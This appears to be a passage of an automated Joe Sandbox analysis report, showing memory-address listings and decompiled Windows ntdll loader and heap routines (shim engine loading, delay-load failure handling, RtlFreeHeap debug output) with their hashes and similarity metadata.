                                                                                                                                                                                  0x333a97a5
                                                                                                                                                                                  0x333a97aa
                                                                                                                                                                                  0x333a97b0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a97b0
                                                                                                                                                                                  0x3334647e
                                                                                                                                                                                  0x3334648b
                                                                                                                                                                                  0x33346498
                                                                                                                                                                                  0x3334649e
                                                                                                                                                                                  0x333a97ed
                                                                                                                                                                                  0x333a97ed
                                                                                                                                                                                  0x333464a4
                                                                                                                                                                                  0x333464a6
                                                                                                                                                                                  0x333a97f7
                                                                                                                                                                                  0x333a97fc
                                                                                                                                                                                  0x333a97fe
                                                                                                                                                                                  0x333a97ce
                                                                                                                                                                                  0x333a97d3
                                                                                                                                                                                  0x333a97d8
                                                                                                                                                                                  0x333a97d8
                                                                                                                                                                                  0x333a97db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333464ac
                                                                                                                                                                                  0x333464b0
                                                                                                                                                                                  0x333464be
                                                                                                                                                                                  0x333464c3
                                                                                                                                                                                  0x333464cc
                                                                                                                                                                                  0x333464d1
                                                                                                                                                                                  0x333464d8
                                                                                                                                                                                  0x333a9802
                                                                                                                                                                                  0x333a9808
                                                                                                                                                                                  0x333a980b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a978f
                                                                                                                                                                                  0x333a9790
                                                                                                                                                                                  0x333a9795
                                                                                                                                                                                  0x333a9796
                                                                                                                                                                                  0x333a979b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333a979b
                                                                                                                                                                                  0x333464de
                                                                                                                                                                                  0x333464eb
                                                                                                                                                                                  0x333464f1
                                                                                                                                                                                  0x333464f9
                                                                                                                                                                                  0x33346507
                                                                                                                                                                                  0x33346510
                                                                                                                                                                                  0x3334651c
                                                                                                                                                                                  0x33346526
                                                                                                                                                                                  0x3334652c
                                                                                                                                                                                  0x3334653c
                                                                                                                                                                                  0x333a981d
                                                                                                                                                                                  0x333a981d
                                                                                                                                                                                  0x3334653c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33346526

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 3334651C
                                                                                                                                                                                    • Part of subcall function 33346565: RtlDebugPrintTimes.NTDLL ref: 33346614
                                                                                                                                                                                    • Part of subcall function 33346565: RtlDebugPrintTimes.NTDLL ref: 3334665F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 333A977C
                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 333A97B9
                                                                                                                                                                                  • apphelp.dll, xrefs: 33346446
                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 333A9790
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 333A97A0, 333A97C9
                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 333A9783, 333A9796, 333A97BF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 3446177414-204845295
                                                                                                                                                                                  • Opcode ID: 85cf0dc052ca300faf90e300259af1cd987816a43b0f7f1d9ed7d43ce5570b72
                                                                                                                                                                                  • Instruction ID: b6c50a686002cde4cb9ec26063611373718e6b00306418b047018036158f4182
                                                                                                                                                                                  • Opcode Fuzzy Hash: 85cf0dc052ca300faf90e300259af1cd987816a43b0f7f1d9ed7d43ce5570b72
                                                                                                                                                                                  • Instruction Fuzzy Hash: DB51DE71A493049FE310DF24DC90F9B77E8EB84755F40C969F594A7660EB30D944CBA2
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333CFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 17%
                                                                                                                                                                                  			E333CFA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E333CF899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x334437c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E333CE692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x334437c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x3344391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x334491e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E33386010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x334491e0(4,  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

























                                                                                                                                                                                  0x333cfa10
                                                                                                                                                                                  0x333cfa12
                                                                                                                                                                                  0x333cfa18
                                                                                                                                                                                  0x333cfa1d
                                                                                                                                                                                  0x333cfa2b
                                                                                                                                                                                  0x333cfa30
                                                                                                                                                                                  0x333cfa35
                                                                                                                                                                                  0x333cfa3a
                                                                                                                                                                                  0x333cfa3c
                                                                                                                                                                                  0x333cfa40
                                                                                                                                                                                  0x333cfa42
                                                                                                                                                                                  0x333cfa42
                                                                                                                                                                                  0x333cfa47
                                                                                                                                                                                  0x333cfa50
                                                                                                                                                                                  0x333cfa51
                                                                                                                                                                                  0x333cfa54
                                                                                                                                                                                  0x333cfa6d
                                                                                                                                                                                  0x333cfa72
                                                                                                                                                                                  0x333cfa77
                                                                                                                                                                                  0x333cfa7c
                                                                                                                                                                                  0x333cfa7e
                                                                                                                                                                                  0x333cfa7e
                                                                                                                                                                                  0x333cfa81
                                                                                                                                                                                  0x333cfa99
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cfa83
                                                                                                                                                                                  0x333cfa8a
                                                                                                                                                                                  0x333cfa8d
                                                                                                                                                                                  0x333cfa9b
                                                                                                                                                                                  0x333cfa9b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cfa95
                                                                                                                                                                                  0x333cfa95
                                                                                                                                                                                  0x333cfa9d
                                                                                                                                                                                  0x333cfa9d
                                                                                                                                                                                  0x333cfaa2
                                                                                                                                                                                  0x333cfb01
                                                                                                                                                                                  0x333cfb01
                                                                                                                                                                                  0x333cfb06
                                                                                                                                                                                  0x333cfb0a
                                                                                                                                                                                  0x333cfb0c
                                                                                                                                                                                  0x333cfb0c
                                                                                                                                                                                  0x333cfb15
                                                                                                                                                                                  0x333cfb1d
                                                                                                                                                                                  0x333cfb1d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cfaa8
                                                                                                                                                                                  0x333cfaae
                                                                                                                                                                                  0x333cfab4
                                                                                                                                                                                  0x333cfaba
                                                                                                                                                                                  0x333cfabd
                                                                                                                                                                                  0x333cfac4
                                                                                                                                                                                  0x333cfac7
                                                                                                                                                                                  0x333cfacf
                                                                                                                                                                                  0x333cfad4
                                                                                                                                                                                  0x333cfae5
                                                                                                                                                                                  0x333cfae8
                                                                                                                                                                                  0x333cfad6
                                                                                                                                                                                  0x333cfad6
                                                                                                                                                                                  0x333cfadd
                                                                                                                                                                                  0x333cfadd
                                                                                                                                                                                  0x333cfaf3
                                                                                                                                                                                  0x333cfafb
                                                                                                                                                                                  0x333cfaff
                                                                                                                                                                                  0x333cfb21
                                                                                                                                                                                  0x333cfb25
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333cfaff
                                                                                                                                                                                  0x333cfaa2
                                                                                                                                                                                  0x333cfa8d

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                  • API String ID: 3446177414-4227709934
                                                                                                                                                                                  • Opcode ID: 98176c902381cd970fd82ae45d119a8c0728ebfa79dd26611686d660367d00b7
                                                                                                                                                                                  • Instruction ID: eb9f214107433c371119028a670e9bd70dd077df792a21b3cbbb03a69fd217b7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 98176c902381cd970fd82ae45d119a8c0728ebfa79dd26611686d660367d00b7
                                                                                                                                                                                  • Instruction Fuzzy Hash: B04145B9E01249ABDB01DF98C980ADEBBF9BF48754F148229E905B7244D7719E11CF90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333FF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                  			E333FF8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x3342d2f8);
				E333A7BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E33347662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E333FFBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E3335FED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E33400835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E3334753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x334447d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E33363BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E33400D24( *((intOrPtr*)(_t165 - 0x30)));
								E33400835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x334447d4;
							if( *0x334447d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E3340D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E33383AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x334447d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x334447d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E3334B910();
								} else {
									E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E333F823A(_t162,  *(_t165 - 0x20)));
								E3334B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x334447a1 = 1;
									 *0x33444100 = 0;
									asm("int3");
									 *0x334447a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E3334B910();
						} else {
							E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E3334B910("About to free block at %p\n",  *0x334447d0);
						goto L30;
					}
				} else {
					_t164 =  *0x33443750; // 0x0
					 *0x334491e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}























                                                                                                                                                                                  0x333ff8f8
                                                                                                                                                                                  0x333ff8fa
                                                                                                                                                                                  0x333ff8ff
                                                                                                                                                                                  0x333ff906
                                                                                                                                                                                  0x333ff909
                                                                                                                                                                                  0x333ff90b
                                                                                                                                                                                  0x333ff910
                                                                                                                                                                                  0x333ff912
                                                                                                                                                                                  0x333ff915
                                                                                                                                                                                  0x333ff91f
                                                                                                                                                                                  0x333ff93e
                                                                                                                                                                                  0x333ff941
                                                                                                                                                                                  0x333ff94f
                                                                                                                                                                                  0x333ff954
                                                                                                                                                                                  0x333ff956
                                                                                                                                                                                  0x333ffb8c
                                                                                                                                                                                  0x333ffb8e
                                                                                                                                                                                  0x333ffb91
                                                                                                                                                                                  0x333ffb91
                                                                                                                                                                                  0x333ffb94
                                                                                                                                                                                  0x333ffb9b
                                                                                                                                                                                  0x333ffba0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ffba0
                                                                                                                                                                                  0x333ff95f
                                                                                                                                                                                  0x333ff962
                                                                                                                                                                                  0x333ff96c
                                                                                                                                                                                  0x333ff96f
                                                                                                                                                                                  0x333ff972
                                                                                                                                                                                  0x333ff97a
                                                                                                                                                                                  0x333ff97f
                                                                                                                                                                                  0x333ff986
                                                                                                                                                                                  0x333ff986
                                                                                                                                                                                  0x333ff98b
                                                                                                                                                                                  0x333ff98b
                                                                                                                                                                                  0x333ff992
                                                                                                                                                                                  0x333ff99a
                                                                                                                                                                                  0x333ff99d
                                                                                                                                                                                  0x333ff9a1
                                                                                                                                                                                  0x333ff9aa
                                                                                                                                                                                  0x333ff9aa
                                                                                                                                                                                  0x333ff9aa
                                                                                                                                                                                  0x333ff9ac
                                                                                                                                                                                  0x333ff9af
                                                                                                                                                                                  0x333ff9b7
                                                                                                                                                                                  0x333ff9b9
                                                                                                                                                                                  0x333ff9be
                                                                                                                                                                                  0x333ff9c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff9c6
                                                                                                                                                                                  0x333ff9c9
                                                                                                                                                                                  0x333ff9cf
                                                                                                                                                                                  0x333ff9d5
                                                                                                                                                                                  0x333ffa1b
                                                                                                                                                                                  0x333ffa1e
                                                                                                                                                                                  0x333ffa21
                                                                                                                                                                                  0x333ffa26
                                                                                                                                                                                  0x333ffb2b
                                                                                                                                                                                  0x333ffb37
                                                                                                                                                                                  0x333ffb39
                                                                                                                                                                                  0x333ffb41
                                                                                                                                                                                  0x333ffb4b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ffb4b
                                                                                                                                                                                  0x333ffa2c
                                                                                                                                                                                  0x333ffa33
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ffa39
                                                                                                                                                                                  0x333ffa3c
                                                                                                                                                                                  0x333ffa3f
                                                                                                                                                                                  0x333ffa42
                                                                                                                                                                                  0x333ffa47
                                                                                                                                                                                  0x333ffa49
                                                                                                                                                                                  0x333ffa4c
                                                                                                                                                                                  0x333ffa51
                                                                                                                                                                                  0x333ffa54
                                                                                                                                                                                  0x333ffa56
                                                                                                                                                                                  0x333ffa5b
                                                                                                                                                                                  0x333ffa60
                                                                                                                                                                                  0x333ffa60
                                                                                                                                                                                  0x333ffa54
                                                                                                                                                                                  0x333ffa63
                                                                                                                                                                                  0x333ffa67
                                                                                                                                                                                  0x333ffa79
                                                                                                                                                                                  0x333ffa7c
                                                                                                                                                                                  0x333ffa7f
                                                                                                                                                                                  0x333ffa69
                                                                                                                                                                                  0x333ffa6b
                                                                                                                                                                                  0x333ffa70
                                                                                                                                                                                  0x333ffa73
                                                                                                                                                                                  0x333ffa73
                                                                                                                                                                                  0x333ffa82
                                                                                                                                                                                  0x333ffa84
                                                                                                                                                                                  0x333ffa88
                                                                                                                                                                                  0x333ffa8b
                                                                                                                                                                                  0x333ffa8d
                                                                                                                                                                                  0x333ffa90
                                                                                                                                                                                  0x333ffa95
                                                                                                                                                                                  0x333ffa9b
                                                                                                                                                                                  0x333ffa9b
                                                                                                                                                                                  0x333ffa9b
                                                                                                                                                                                  0x333ffa9d
                                                                                                                                                                                  0x333ffaa0
                                                                                                                                                                                  0x333ffaa6
                                                                                                                                                                                  0x333ffaad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ffab3
                                                                                                                                                                                  0x333ffaba
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ffabc
                                                                                                                                                                                  0x333ffac2
                                                                                                                                                                                  0x333ffac5
                                                                                                                                                                                  0x333ffae4
                                                                                                                                                                                  0x333ffae9
                                                                                                                                                                                  0x333ffac7
                                                                                                                                                                                  0x333ffadc
                                                                                                                                                                                  0x333ffae1
                                                                                                                                                                                  0x333ffafa
                                                                                                                                                                                  0x333ffb03
                                                                                                                                                                                  0x333ffb0b
                                                                                                                                                                                  0x333ffb0b
                                                                                                                                                                                  0x333ffb11
                                                                                                                                                                                  0x333ffb15
                                                                                                                                                                                  0x333ffb17
                                                                                                                                                                                  0x333ffb1e
                                                                                                                                                                                  0x333ffb24
                                                                                                                                                                                  0x333ffb25
                                                                                                                                                                                  0x333ffb25
                                                                                                                                                                                  0x333ffb15
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ffaa0
                                                                                                                                                                                  0x333ff9d7
                                                                                                                                                                                  0x333ff9da
                                                                                                                                                                                  0x333ff9f9
                                                                                                                                                                                  0x333ff9fe
                                                                                                                                                                                  0x333ff9dc
                                                                                                                                                                                  0x333ff9f1
                                                                                                                                                                                  0x333ff9f6
                                                                                                                                                                                  0x333ffa0f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ffa15
                                                                                                                                                                                  0x333ff921
                                                                                                                                                                                  0x333ff926
                                                                                                                                                                                  0x333ff92e
                                                                                                                                                                                  0x333ff936
                                                                                                                                                                                  0x333ffba2
                                                                                                                                                                                  0x333ffba5
                                                                                                                                                                                  0x333ffbb1
                                                                                                                                                                                  0x333ffbb1

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                  • API String ID: 3446177414-3492000579
                                                                                                                                                                                  • Opcode ID: d1d0d051164ff81c8510275535933cb31c58d862318f05655380c4294ef85415
                                                                                                                                                                                  • Instruction ID: 0f9ec1a6cc1cbeb5a3f2c69baa5f560867c6465c3622123ad9bd10149a4332e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: d1d0d051164ff81c8510275535933cb31c58d862318f05655380c4294ef85415
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F71CD75901744AFDB01DFA8D8906ADFBF1FF49310F88C26AE885AB651CB369941CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33346565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                                  			E33346565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x3344b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E3336E8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x33449200; // 0x0
				_t113 = 0x20;
				 *0x334465f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E3337E7E0(_t92, _v92);
					}
					_t114 =  *0x33449210; // 0x0
					asm("ror esi, cl");
					 *0x334491e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x33449218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E3335FED0(0x334432d8);
					_t98 = 0x33445d8c;
					if( *0x334465f0 != 0) {
						_t56 =  *0x33445d8c; // 0x2fe2d40
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x33445d8c; // 0x2fe2d40
						if( *0x334465f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x334465f0 = 1;
							 *0x334465f8 = 0;
							E3335E740(_t98);
							E3334676F(_t98);
							return E33394B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x334432d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x2fe2d08
								_t98 =  *_t24;
								E33346704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x33445d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E33395050(_t92,  &_v108, _t110);
					_t92 = E33346B45( &_v108,  &_v92, "true",  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x334437c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E333CE692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x334437c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					L33387DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x334491e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E3336D3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E333716EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x334437c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
